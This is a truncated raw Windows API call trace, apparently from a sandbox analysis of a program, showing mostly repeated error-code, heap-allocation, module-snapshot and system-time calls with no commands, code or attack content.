SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] GetLastError () returned 0x0 [0045.393] SetLastError (dwErrCode=0x0) [0045.393] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x98) returned 0x5a1a10 [0045.393] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1f) returned 0x5a1ab0 [0045.393] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x36) returned 0x5a1ad8 [0045.393] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x37) returned 0x5a1b18 [0045.393] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c) returned 0x5a1b58 [0045.393] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x31) returned 0x5a1ba0 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x17) returned 0x5a1be0 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5a1c00 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x14) returned 0x5a1c30 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xd) returned 0x5a1c50 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x25) returned 0x5a1c68 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x39) returned 0x5a1c98 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5a1ce0 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x17) returned 0x5a1d00 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xe) returned 0x5a1d20 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x69) returned 0x5a1d38 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3e) returned 0x5a1db0 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1b) returned 0x5a1df8 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1d) returned 0x5a1e20 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x48) returned 0x5a1e48 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5a1e98 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5a1eb8 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1b) returned 0x5a1ed8 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5a1f00 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x29) returned 0x5a1f30 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1e) returned 0x5a1f68 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x41) returned 0x5a1f90 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x17) returned 0x5a1fe8 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xf) returned 0x5a2008 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x16) returned 0x5a2020 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2a) returned 0x5a2040 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x29) returned 0x5a2078 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x15) returned 0x5a20b0 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1e) returned 0x5a20d0 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2a) returned 0x5a20f8 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5a2130 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5a2150 [0045.394] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x46) returned 0x5a2170 [0045.394] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a11f8 | out: hHeap=0x5a0000) returned 1 [0045.395] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x800) returned 0x5a21c0 [0045.395] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x80) returned 0x5a11f8 [0045.395] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0045.396] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5a11f8) returned 0x80 [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.396] GetLastError () returned 0x0 [0045.396] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.397] SetLastError (dwErrCode=0x0) [0045.397] GetLastError () returned 0x0 [0045.398] SetLastError (dwErrCode=0x0) [0045.398] GetLastError () returned 0x0 [0045.398] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0045.398] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0045.398] GetProcAddress (hModule=0x76c20000, lpProcName="Module32FirstW") returned 0x76c579f9 [0045.398] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0045.399] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0045.400] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0045.400] GetTickCount () returned 0x1144e9d [0045.400] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.400] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.400] GetACP () returned 0x4e4 [0045.400] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.400] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.400] GetACP () returned 0x4e4 [0045.400] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.400] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.400] GetACP () returned 0x4e4 [0045.400] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.400] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.400] GetACP () returned 0x4e4 [0045.400] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.400] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.400] GetACP () returned 0x4e4 [0045.400] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.400] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.400] GetACP () returned 0x4e4 [0045.400] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.400] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.400] GetACP () returned 0x4e4 [0045.400] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.401] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.401] GetACP () returned 0x4e4 [0045.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.402] GetACP () returned 0x4e4 [0045.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.402] GetACP () returned 0x4e4 [0045.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.402] GetACP () returned 0x4e4 [0045.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.402] GetACP () returned 0x4e4 [0045.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.402] GetACP () returned 0x4e4 [0045.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.402] GetACP () returned 0x4e4 [0045.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.402] GetACP () returned 0x4e4 [0045.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.402] GetACP () returned 0x4e4 [0045.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.402] GetACP () returned 0x4e4 [0045.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.403] GetACP () returned 0x4e4 [0045.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.403] GetACP () returned 0x4e4 [0045.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.403] GetACP () returned 0x4e4 [0045.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.403] GetACP () returned 0x4e4 [0045.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.403] GetACP () returned 0x4e4 [0045.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.403] GetACP () returned 0x4e4 [0045.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.403] GetACP () returned 0x4e4 [0045.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.403] GetACP () returned 0x4e4 [0045.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.403] GetACP () returned 0x4e4 [0045.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: 